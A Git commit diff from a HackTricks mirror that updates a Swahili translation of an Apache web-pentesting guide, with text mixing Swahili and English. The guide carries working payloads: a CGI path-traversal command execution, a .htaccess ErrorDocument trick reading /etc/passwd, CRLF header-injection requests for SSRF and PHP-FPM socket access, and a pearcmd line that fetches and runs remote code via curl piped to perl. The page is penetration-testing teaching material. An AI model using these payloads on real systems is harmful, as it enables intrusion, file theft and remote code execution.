maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/network-services-pentesting/pentesting-web/apache.m

Browse Source
This commit is contained in:
Translator 2025-08-28 18:58:27 +00:00
parent 975876ebbc
commit f9ebe8b2d6
2 changed files with 430 additions and 389 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

662
src/linux-hardening/privilege-escalation/README.md
View File

File diff suppressed because it is too large Load Diff

153
src/network-services-pentesting/pentesting-web/apache.md
View File

@ -2,9 +2,9 @@
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
## Extensions za PHP zinazoweza kutekelezwa ## Viendelezo vya PHP vinavyoweza kutekelezwa
Angalia ni extensions gani zinazoendesha seva ya Apache. Ili kuzitafuta unaweza kutekeleza: Angalia ni viendelezo gani vinavyotekelezwa na seva ya Apache. Ili kutafuta, unaweza kutekeleza:
```bash ```bash
grep -R -B1 "httpd-php" /etc/apache2 grep -R -B1 "httpd-php" /etc/apache2
``` ```
@ -21,19 +21,47 @@ curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Con
uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux Linux
``` ```
## LFI kwa kutumia .htaccess ErrorDocument file provider (ap_expr)
Iwapo unaweza kudhibiti .htaccess ya saraka na AllowOverride inajumuisha FileInfo kwa njia hiyo, unaweza kubadilisha majibu ya 404 kuwa kusoma mafaili ya ndani kwa hiari kwa kutumia function file() ya ap_expr ndani ya ErrorDocument.
- Mahitaji:
- Apache 2.4 na expression parser (ap_expr) imewezeshwa (chaguo-msingi katika 2.4).
- vhost/dir inapaswa kuruhusu .htaccess kuweka ErrorDocument (AllowOverride FileInfo).
- mtumiaji wa worker wa Apache lazima awe na ruhusa za kusoma kwenye faili lengwa.
.htaccess payload:
```apache
# Optional marker header just to identify your tenant/request path
Header always set X-Debug-Tenant "demo"
# On any 404 under this directory, return the contents of an absolute filesystem path
ErrorDocument 404 %{file:/etc/passwd}
```
Chochea kwa kuomba njia yoyote isiyokuwepo chini ya saraka hiyo, kwa mfano unapotumia vibaya userdir-style hosting:
```bash
curl -s http://target/~user/does-not-exist | sed -n '1,20p'
```
Vidokezo na ushauri:
- Njia kamili pekee ndizo zinazofanya kazi. Yaliyomo yatarudishwa kama mwili wa jibu kwa handler ya 404.
- Idhini za kusoma zinazofanya kazi ni zile za mtumiaji wa Apache (kwa kawaida www-data/apache). Hutaweza kusoma /root/* au /etc/shadow katika usanidi wa chaguomsingi.
- Hata kama .htaccess ni milki ya root, ikiwa saraka ya mzazi inamilikiwa na tenant na inaruhusu rename, unaweza kufanikiwa kubadilisha jina la .htaccess ya awali na kupakia toleo lako kupitia SFTP/FTP:
- rename .htaccess .htaccess.bk
- put your malicious .htaccess
- Tumia hili kusoma chanzo cha application chini ya DocumentRoot au vhost config paths ili kuvuna siri (DB creds, API keys, etc.).
## Confusion Attack <a href="#a-whole-new-attack-confusion-attack" id="a-whole-new-attack-confusion-attack"></a> ## Confusion Attack <a href="#a-whole-new-attack-confusion-attack" id="a-whole-new-attack-confusion-attack"></a>
Aina hizi za mashambulizi zimeanzishwa na kuandikwa [**na Orange katika chapisho hili la blog**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) na yafuatayo ni muhtasari. Shambulizi la "confusion" kimsingi linatumia jinsi moduli kumi zinazofanya kazi pamoja kuunda Apache hazifanyi kazi kwa usawa na kufanya baadhi yao kubadilisha data zisizotarajiwa kunaweza kusababisha udhaifu katika moduli inayofuata. Aina hizi za mashambulizi zilitangazwa na kurekodiwa [**by Orange in this blog post**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) na yafuatayo ni muhtasari. Shambulizi la "confusion" kwa msingi linatumia jinsi modules nyingi zinazofanya kazi pamoja kuunda Apache hazifanyi kazi kwa usawazishwaji kamili; kufanya baadhi yao kubadilisha data isiyotegemewa kunaweza kusababisha udhaifu katika module inayofuata.
### Filename Confusion ### Filename Confusion
#### Truncation #### Truncation
**`mod_rewrite`** itakata maudhui ya `r->filename` baada ya herufi `?` ([_**modules/mappers/mod_rewrite.c#L4141**_](https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L4141)). Hii si sahihi kabisa kwani moduli nyingi zitachukulia `r->filename` kama URL. Lakini katika matukio mengine hii itachukuliwa kama njia ya faili, ambayo itasababisha tatizo. The **`mod_rewrite`** will trim the content of `r->filename` after the character `?` ([_**modules/mappers/mod_rewrite.c#L4141**_](https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L4141)). This isn't totally wrong as most modules will treat `r->filename` as an URL. Lakini wakati mwingine itachukuliwa kama file path, jambo ambalo litasababisha tatizo.
- **Path Truncation** - **Path Truncation**
Inawezekana kutumia vibaya `mod_rewrite` kama katika mfano wa sheria ifuatayo ili kufikia faili nyingine ndani ya mfumo wa faili, kuondoa sehemu ya mwisho ya njia inayotarajiwa kwa kuongeza tu `?`: Niwezekana kutumiwa `mod_rewrite` kama katika mfano wa sheria ufuatao kufikia faili nyingine ndani ya mfumo wa faili, kwa kuondoa sehemu ya mwisho ya njia iliyotarajiwa kwa kuongeza tu `?`:
```bash ```bash
RewriteEngine On RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml" RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"
@ -46,9 +74,9 @@ curl http://server/user/orange
curl http://server/user/orange%2Fsecret.yml%3F curl http://server/user/orange%2Fsecret.yml%3F
# the output of file `/var/user/orange/secret.yml` # the output of file `/var/user/orange/secret.yml`
``` ```
- **Kuweka Upya Kiwango cha RewriteFlag** - **Uteuzi wa RewriteFlag wa Kuwadanganya**
Katika sheria ifuatayo ya kuandika upya, mradi tu URL inamalizika na .php itachukuliwa na kutekelezwa kama php. Hivyo, inawezekana kutuma URL inayomalizika na .php baada ya herufi `?` wakati wa kupakia katika njia aina tofauti ya faili (kama picha) yenye msimbo mbaya wa php ndani yake: Katika rewrite rule ifuatayo, mradi URL itakapomalizika kwa .php itatibiwa na kutekelezwa kama php. Kwa hivyo, inawezekana kutuma URL inayomalizika kwa .php baada ya `?` huku ikipakia kwenye path aina tofauti ya faili (kama picha) yenye msimbo wa php wenye madhara ndani yake:
```bash ```bash
RewriteEngine On RewriteEngine On
RewriteRule ^(.+\.php)$ $1 [H=application/x-httpd-php] RewriteRule ^(.+\.php)$ $1 [H=application/x-httpd-php]
@ -63,7 +91,7 @@ curl http://server/upload/1.gif%3fooo.php
``` ```
#### **ACL Bypass** #### **ACL Bypass**
Inawezekana kufikia faili ambazo mtumiaji hapaswi kuwa na uwezo wa kufikia hata kama ufikiaji unapaswa kukataliwa na mipangilio kama: Inawezekana kupata faili ambazo mtumiaji haipaswi kupata, hata kama ufikiaji unapaswa kukataliwa kwa usanidi kama:
```xml ```xml
<Files "admin.php"> <Files "admin.php">
AuthType Basic AuthType Basic
@ -72,20 +100,20 @@ AuthUserFile "/etc/apache2/.htpasswd"
Require valid-user Require valid-user
</Files> </Files>
``` ```
Hii ni kwa sababu kwa default PHP-FPM itapokea URLs zinazomalizika na `.php`, kama `http://server/admin.php%3Fooo.php` na kwa sababu PHP-FPM itafuta chochote baada ya herufi `?`, URL ya awali itaruhusu kupakia `/admin.php` hata kama sheria ya awali ilikataza. Kwa sababu kwa chaguo-msingi PHP-FPM itapokea URLs zinazomalizika na `.php`, kama `http://server/admin.php%3Fooo.php`, na kwa sababu PHP-FPM itaondoa chochote baada ya alama `?`, URL hapo juu itaruhusu kupakia `/admin.php` hata kama sheria iliyotangulia ilizuia.
### DocumentRoot Confusion ### DocumentRoot Kuchanganyikiwa
```bash ```bash
DocumentRoot /var/www/html DocumentRoot /var/www/html
RewriteRule ^/html/(.*)$ /$1.html RewriteRule ^/html/(.*)$ /$1.html
``` ```
A fun fact about Apache is that the previous rewrite will try to access the file from both the documentRoot and from root. So, a request to `https://server/abouth.html` will check for the file in `/var/www/html/about.html` and `/about.html` in the file system. Which basically can be abused to access files in the file system. Jambo la kufurahisha kuhusu Apache ni kwamba rewrite iliyopita itajaribu kufikia faili kutoka kwa documentRoot na kutoka root. Kwa hivyo, ombi la `https://server/abouth.html` litatafuta faili katika `/var/www/html/about.html` na `/about.html` kwenye mfumo wa faili. Hii kwa msingi inaweza kutumika vibaya kufikia faili ndani ya mfumo wa faili.
#### **Server-Side Source Code Disclosure** #### **Ufunuo wa Chanzo upande wa Server**
- **Disclose CGI Source Code** - **Ufunuo wa Chanzo la CGI**
Just adding a %3F at the end is enough to leak the source code of a cgi module: Kuweka tu %3F mwishoni inatosha leak msimbo wa module ya cgi:
```bash ```bash
curl http://server/cgi-bin/download.cgi curl http://server/cgi-bin/download.cgi
# the processed result from download.cgi # the processed result from download.cgi
@ -95,62 +123,62 @@ curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
# ... # ...
# # the source code of download.cgi # # the source code of download.cgi
``` ```
- **Fichua Msimbo wa Chanzo wa PHP** - **Kufichua Chanzo la PHP**
Ikiwa seva ina maeneo tofauti na moja yao ikiwa ni eneo la kudumu, hii inaweza kutumika vibaya kuvuka mfumo wa faili na kufichua msimbo wa php: Ikiwa server ina domain tofauti na moja kati yao ni domain ya static, hii inaweza kutumika vibaya kutembea kwenye mfumo wa faili na leak php code:
```bash ```bash
# Leak the config.php file of the www.local domain from the static.local domain # Leak the config.php file of the www.local domain from the static.local domain
curl http://www.local/var/www.local/config.php%3F -H "Host: static.local" curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
# the source code of config.php # the source code of config.php
``` ```
#### **Usimamizi wa Vifaa vya Mitaa** #### **Local Gadgets Manipulation**
Shida kuu na shambulio la awali ni kwamba kwa kawaida ufikiaji mwingi juu ya mfumo wa faili utawekewa vizuizi kama ilivyo katika [kigezo cha usanidi](https://github.com/apache/httpd/blob/trunk/docs/conf/httpd.conf.in#L115) cha Apache HTTP Server: Tatizo kuu na shambulio lililopita ni kwamba kwa chaguo-msingi, sehemu kubwa ya ufikiaji wa filesystem itakataliwa, kama ilivyo kwenye Apache HTTP Servers [configuration template](https://github.com/apache/httpd/blob/trunk/docs/conf/httpd.conf.in#L115):
```xml ```xml
<Directory /> <Directory />
AllowOverride None AllowOverride None
Require all denied Require all denied
</Directory> </Directory>
``` ```
Hata hivyo, [Debian/Ubuntu](https://sources.debian.org/src/apache2/2.4.62-1/debian/config-dir/apache2.conf.in/#L165) mifumo ya uendeshaji kwa default inaruhusu `/usr/share`: Hata hivyo, mifumo ya uendeshaji ya [Debian/Ubuntu](https://sources.debian.org/src/apache2/2.4.62-1/debian/config-dir/apache2.conf.in/#L165) kwa chaguo-msingi huruhusu `/usr/share`:
```xml ```xml
<Directory /usr/share> <Directory /usr/share>
AllowOverride None AllowOverride None
Require all granted Require all granted
</Directory> </Directory>
``` ```
Kwa hivyo, itakuwa inawezekana **kudhulumu faili zilizoko ndani ya `/usr/share` katika usambazaji hizi.** Therefore, it would be possible to **abuse files located inside `/usr/share` in these distributions.**
**Gadget ya Mitaa kwa Ufunuo wa Taarifa** **Gadget ya Ndani kwa Information Disclosure**
- **Apache HTTP Server** na **websocketd** inaweza kufichua **dump-env.php** script kwenye **/usr/share/doc/websocketd/examples/php/**, ambayo inaweza kuvuja mabadiliko ya mazingira ya nyeti. - **Apache HTTP Server** with **websocketd** may expose the **dump-env.php** script at **/usr/share/doc/websocketd/examples/php/**, which can leak sensitive environment variables.
- Seva zenye **Nginx** au **Jetty** zinaweza kufichua taarifa nyeti za programu za wavuti (mfano, **web.xml**) kupitia mizizi yao ya wavuti ya kawaida iliyowekwa chini ya **/usr/share**: - Servers with **Nginx** or **Jetty** might expose sensitive web application information (e.g., **web.xml**) through their default web roots placed under **/usr/share**:
- **/usr/share/nginx/html/** - **/usr/share/nginx/html/**
- **/usr/share/jetty9/etc/** - **/usr/share/jetty9/etc/**
- **/usr/share/jetty9/webapps/** - **/usr/share/jetty9/webapps/**
**Gadget ya Mitaa kwa XSS** **Gadget ya Ndani kwa XSS**
- Kwenye Ubuntu Desktop yenye **LibreOffice imewekwa**, kudhulumu kipengele cha kubadilisha lugha za faili za msaada kunaweza kusababisha **Cross-Site Scripting (XSS)**. Kubadilisha URL kwenye **/usr/share/libreoffice/help/help.html** kunaweza kuelekeza kwenye kurasa za uhalifu au toleo la zamani kupitia **unsafe RewriteRule**. - On Ubuntu Desktop with **LibreOffice installed**, exploiting the help files' language switch feature can lead to **Cross-Site Scripting (XSS)**. Manipulating the URL at **/usr/share/libreoffice/help/help.html** can redirect to malicious pages or older versions through **unsafe RewriteRule**.
**Gadget ya Mitaa kwa LFI** **Gadget ya Ndani kwa LFI**
- Ikiwa PHP au pakiti fulani za mbele kama **JpGraph** au **jQuery-jFeed** zimewekwa, faili zao zinaweza kudhulumiwa kusoma faili nyeti kama **/etc/passwd**: - If PHP or certain front-end packages like **JpGraph** or **jQuery-jFeed** are installed, their files can be exploited to read sensitive files like **/etc/passwd**:
- **/usr/share/doc/libphp-jpgraph-examples/examples/show-source.php** - **/usr/share/doc/libphp-jpgraph-examples/examples/show-source.php**
- **/usr/share/javascript/jquery-jfeed/proxy.php** - **/usr/share/javascript/jquery-jfeed/proxy.php**
- **/usr/share/moodle/mod/assignment/type/wims/getcsv.php** - **/usr/share/moodle/mod/assignment/type/wims/getcsv.php**
**Gadget ya Mitaa kwa SSRF** **Gadget ya Ndani kwa SSRF**
- Kutumia **MagpieRSS's magpie_debug.php** kwenye **/usr/share/php/magpierss/scripts/magpie_debug.php**, udhaifu wa SSRF unaweza kuundwa kwa urahisi, ukitoa lango kwa udhalilishaji zaidi. - Utilizing **MagpieRSS's magpie_debug.php** at **/usr/share/php/magpierss/scripts/magpie_debug.php**, an SSRF vulnerability can be easily created, providing a gateway to further exploits.
**Gadget ya Mitaa kwa RCE** **Gadget ya Ndani kwa RCE**
- Fursa za **Remote Code Execution (RCE)** ni nyingi, na usakinishaji dhaifu kama **PHPUnit** ya zamani au **phpLiteAdmin**. Hizi zinaweza kudhulumiwa kutekeleza msimbo wa kiholela, ikionyesha uwezo mkubwa wa kudhulumu gadget za ndani. - Opportunities for **Remote Code Execution (RCE)** are vast, with vulnerable installations like an outdated **PHPUnit** or **phpLiteAdmin**. These can be exploited to execute arbitrary code, showcasing the extensive potential of local gadgets manipulation.
#### **Jailbreak kutoka kwa Gadget za Mitaa** #### **Jailbreak from Local Gadgets**
Pia inawezekana kufanya jailbreak kutoka kwenye folda zilizoruhusiwa kwa kufuata symlinks zilizoundwa na programu zilizowekwa katika folda hizo, kama: It's also possible to jailbreak from the allowed folders by following symlinks generated by installed software in those folders, like:
- **Cacti Log**: `/usr/share/cacti/site/` -> `/var/log/cacti/` - **Cacti Log**: `/usr/share/cacti/site/` -> `/var/log/cacti/`
- **Solr Data**: `/usr/share/solr/data/` -> `/var/lib/solr/data` - **Solr Data**: `/usr/share/solr/data/` -> `/var/lib/solr/data`
@ -158,55 +186,55 @@ Pia inawezekana kufanya jailbreak kutoka kwenye folda zilizoruhusiwa kwa kufuata
- **MediaWiki Config**: `/usr/share/mediawiki/config/` -> `/var/lib/mediawiki/config/` - **MediaWiki Config**: `/usr/share/mediawiki/config/` -> `/var/lib/mediawiki/config/`
- **SimpleSAMLphp Config**: `/usr/share/simplesamlphp/config/` -> `/etc/simplesamlphp/` - **SimpleSAMLphp Config**: `/usr/share/simplesamlphp/config/` -> `/etc/simplesamlphp/`
Zaidi ya hayo, kudhulumu symlinks ilikuwa inawezekana kupata **RCE katika Redmine.** Moreover, abusing symlinks it was possible to obtain **RCE in Redmine.**
### Handler Confusion <a href="#id-3-handler-confusion" id="id-3-handler-confusion"></a> ### Mkanganyiko wa Handler <a href="#id-3-handler-confusion" id="id-3-handler-confusion"></a>
Shambulio hili linatumia mchanganyiko wa kazi kati ya `AddHandler` na `AddType` directives, ambazo zote zinaweza kutumika **kuwezesha usindikaji wa PHP**. Awali, directives hizi zilihusisha maeneo tofauti (`r->handler` na `r->content_type` mtawalia) katika muundo wa ndani wa seva. Hata hivyo, kutokana na msimbo wa urithi, Apache inashughulikia directives hizi kwa kubadilishana chini ya hali fulani, ikigeuza `r->content_type` kuwa `r->handler` ikiwa ya kwanza imewekwa na ya pili haijawa. This attack exploits the overlap in functionality between the `AddHandler` and `AddType` directives, which both can be used to **enable PHP processing**. Originally, these directives affected different fields (`r->handler` and `r->content_type` respectively) in the server's internal structure. However, due to legacy code, Apache handles these directives interchangeably under certain conditions, converting `r->content_type` into `r->handler` if the former is set and the latter is not.
Zaidi ya hayo, katika Apache HTTP Server (`server/config.c#L420`), ikiwa `r->handler` iko tupu kabla ya kutekeleza `ap_run_handler()`, seva **inatumia `r->content_type` kama handler**, kwa ufanisi ikifanya `AddType` na `AddHandler` kuwa sawa katika athari. Moreover, in the Apache HTTP Server (`server/config.c#L420`), if `r->handler` is empty before executing `ap_run_handler()`, the server **uses `r->content_type` as the handler**, effectively making `AddType` and `AddHandler` identical in effect.
#### **Overwrite Handler ili Kufichua Msimbo wa PHP** #### **Overwrite Handler to Disclose PHP Source Code**
Katika [**hii hotuba**](https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf), ilionyeshwa udhaifu ambapo `Content-Length` isiyo sahihi iliyotumwa na mteja inaweza kusababisha Apache kurudisha **msimbo wa PHP** kwa makosa. Hii ilikuwa kwa sababu ya tatizo la kushughulikia makosa na ModSecurity na Apache Portable Runtime (APR), ambapo jibu mara mbili linaweza kusababisha kuandika upya `r->content_type` kuwa `text/html`.\ In [**this talk**](https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf), was presented a vulnerability where an incorrect `Content-Length` sent by a client can cause Apache to mistakenly **return the PHP source code**. This was because an error handling issue with ModSecurity and the Apache Portable Runtime (APR), where a double response leads to overwriting `r->content_type` to `text/html`.\
Kwa sababu ModSecurity haiwezi kushughulikia vizuri thamani za kurudi, itarudisha msimbo wa PHP na haitautafsiri. Because ModSecurity doesn't properly handle return values, it would return the PHP code and won't interpret it.
#### **Overwrite Handler kwa XXXX** #### **Overwrite Handler to XXXX**
TODO: Orange hajafichua udhaifu huu bado TODO: Orange hasn't disclose this vulnerability yet
### **Kuitisha Handlers za Kiholela** ### **Invoke Arbitrary Handlers**
Ikiwa mshambuliaji anaweza kudhibiti **`Content-Type`** header katika jibu la seva atakuwa na uwezo wa **kuitisha handlers za moduli za kiholela**. Hata hivyo, kwa hatua ambayo mshambuliaji anadhibiti hii, mchakato mwingi wa ombi utakuwa umekamilika. Hata hivyo, inawezekana **kuanzisha upya mchakato wa ombi kwa kudhulumu `Location` header** kwa sababu ikiwa **r**eturned `Status` ni 200 na `Location` header inaanza na `/`, jibu linachukuliwa kama Uelekeo wa Seva na linapaswa kushughulikiwa. If an attacker is able to control the **`Content-Type`** header in a server response he is going to be able to **invoke arbitrary module handlers**. However, by the point the attacker controls this, most of the process of the request will be done. However, it's possible to **restart the request process abusing the `Location` header** because if the **r**eturned `Status` is 200 and the `Location` header starts with a `/`, the response is treated as a Server-Side Redirection and should be processed
Kulingana na [RFC 3875](https://datatracker.ietf.org/doc/html/rfc3875) (specification kuhusu CGI) katika [Sehemu 6.2.2](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2) inafafanua tabia ya Jibu la Uelekeo wa Mitaa: According to [RFC 3875](https://datatracker.ietf.org/doc/html/rfc3875) (specification about CGI) in [Section 6.2.2](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2) defines a Local Redirect Response behavior:
> Skripti ya CGI inaweza kurudisha njia ya URI na mfuatano wa swali (local-pathquery) kwa rasilimali ya ndani katika uwanja wa header wa Location. Hii inaashiria kwa seva kwamba inapaswa kuendelea kushughulikia ombi kwa kutumia njia iliyotajwa. > The CGI script can return a URI path and query-string (local-pathquery) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.
Kwa hivyo, ili kutekeleza shambulio hili inahitajika moja ya udhaifu ufuatao: Therefore, to perform this attack is needed one of the following vulns:
- CRLF Injection katika vichwa vya jibu vya CGI - CRLF Injection in the CGI response headers
- SSRF kwa udhibiti kamili wa vichwa vya jibu - SSRF with complete control of the response headers
#### **Handler ya Kiholela kwa Ufunuo wa Taarifa** #### **Handler yoyote kwa Information Disclosure**
Kwa mfano `/server-status` inapaswa kuwa inapatikana tu kwa ndani: For example `/server-status` should only be accessible locally:
```xml ```xml
<Location /server-status> <Location /server-status>
SetHandler server-status SetHandler server-status
Require local Require local
</Location> </Location>
``` ```
Inawezekana kuipata kwa kuweka `Content-Type` kuwa `server-status` na kichwa cha Location kinachoanza na `/` Inawezekana kuifikia kwa kuweka `Content-Type` kuwa `server-status` na header ya Location kuanza na `/`
``` ```
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a Location:/ooo %0d%0a
Content-Type:server-status %0d%0a Content-Type:server-status %0d%0a
%0d%0a %0d%0a
``` ```
#### **Mshughulikiaji wa Kawaida kwa SSRF Kamili** #### **Arbitrary Handler hadi SSRF Kamili**
Kuelekeza kwa `mod_proxy` ili kufikia protokali yoyote kwenye URL yoyote: Kuelekeza kwa `mod_proxy` ili kufikia protokoli yoyote kwenye URL yoyote:
``` ```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a Location:/ooo %0d%0a
@ -215,20 +243,20 @@ http://example.com/%3F
%0d%0a %0d%0a
%0d%0a %0d%0a
``` ```
Hata hivyo, kichwa cha `X-Forwarded-For` kinajumuishwa kuzuia ufikiaji wa mwisho wa metadata ya wingu. Hata hivyo, header ya `X-Forwarded-For` inaongezwa, ikizuia upatikanaji wa cloud metadata endpoints.
#### **Mshughulikiaji wa Kijazaji ili Kufikia Socket ya Kihali ya Unix ya Mitaa** #### **Mshughulikiaji lolote ili Kufikia Unix Domain Socket ya ndani**
Fikia Socket ya Kihali ya Unix ya PHP-FPM ili kutekeleza backdoor ya PHP iliyoko katika `/tmp/`: Fikia Unix Domain Socket ya ndani ya PHP-FPM ili kutekeleza PHP backdoor iliyoko katika `/tmp/`:
``` ```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a %0d%0a
``` ```
#### **Mshughulikiaji wa Hali ya Juu kwa RCE** #### **Arbitrary Handler to RCE**
Picha rasmi ya [PHP Docker](https://hub.docker.com/_/php) inajumuisha PEAR (`Pearcmd.php`), chombo cha usimamizi wa pakiti za PHP cha mstari wa amri, ambacho kinaweza kutumika vibaya kupata RCE: Image rasmi ya [PHP Docker](https://hub.docker.com/_/php) inajumuisha PEAR (`Pearcmd.php`), zana ya usimamizi wa pakiti za PHP kwa mstari wa amri, ambayo inaweza kutumiwa vibaya kupata RCE:
``` ```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS} Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}
@ -237,10 +265,13 @@ orange.tw/x|perl
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a %0d%0a
``` ```
Angalia [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), iliyoandikwa na [Phith0n](https://x.com/phithon_xg) kwa maelezo ya mbinu hii. Angalia [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), imeandikwa na [Phith0n](https://x.com/phithon_xg) kwa maelezo ya kina ya mbinu hii.
## Marejeleo ## Marejeo
- [https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) - [https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1)
- [Apache 2.4 Custom Error Responses (ErrorDocument)](https://httpd.apache.org/docs/2.4/custom-error.html)
- [Apache 2.4 Expressions and functions (file:)](https://httpd.apache.org/docs/2.4/expr.html)
- [HTB Zero write-up: .htaccess ErrorDocument LFI and cron pgrep abuse](https://0xdf.gitlab.io/2025/08/12/htb-zero.html)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}